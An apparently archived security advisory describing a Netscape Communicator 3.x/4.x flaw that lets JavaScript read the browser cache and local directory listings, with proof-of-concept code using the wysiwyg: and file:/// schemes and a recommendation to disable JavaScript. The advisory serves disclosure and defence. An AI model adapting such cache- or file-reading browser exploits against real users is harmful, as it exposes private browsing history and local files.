COMMAND

    Netscape

SYSTEMS AFFECTED

    Netscape Communicator 3.04, 4.5, 4.07 under Win, Linux, etc

PROBLEM

    Georgi  Guninski  found  following.   There  is  a bug in Netscape
    Communicator 4.5,  4.07, 3.04  under Windows  95 (probably others)
    which allows reading user's cache (the urls the user has  visited,
    including  the  info  in  GET  forms).  Reading  local directories
    content is  also allowed.  This info  may be  sent to an arbitrary
    host.  The bug may be exploited by email.  Demonstration is
    available at:

      Cache reading:
        http://www.geocities.com/ResearchTriangle/1711/b4.html

      Directory reading:
        http://www.geocities.com/ResearchTriangle/1711/b5.html

    The javascript code is:

        sl=window.open('wysiwyg://1/about:cache');
        //For Netscape 3.04 remove 'wysiwyg://1/'
        sl2=sl.window.open();
        sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here
        are some links from your cache:\"; for(i=0;i<5;i++)
        x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()";
        sl2.location.reload();

    It is confirmed  this also works  under Linux, and  probably other
    Unixes as demonstrated by the slightly modified copy available at:

        http://www-miaif.lip6.fr/willy/security/netscape.html

    Ryan Gray added that Netscape Communicator 4.5b2 on Slackware  3.5
    (kernel 2.0.34)  is susceptible  to this  also.   As for the local
    reading, with a little modification,  it'll do that to.   Example.
    The line in George's script that reads local files is:

        sl=window.open('wysiwyg://1/file:///c|/');

    With just little change, taking the Linux directory structure into
    consideration and adding proper backslash escapes:

        sl=window.open('wysiwyg://1/file://\/');

    That'll give you listing of '/' on the local box.

SOLUTION

    Disable Javascript.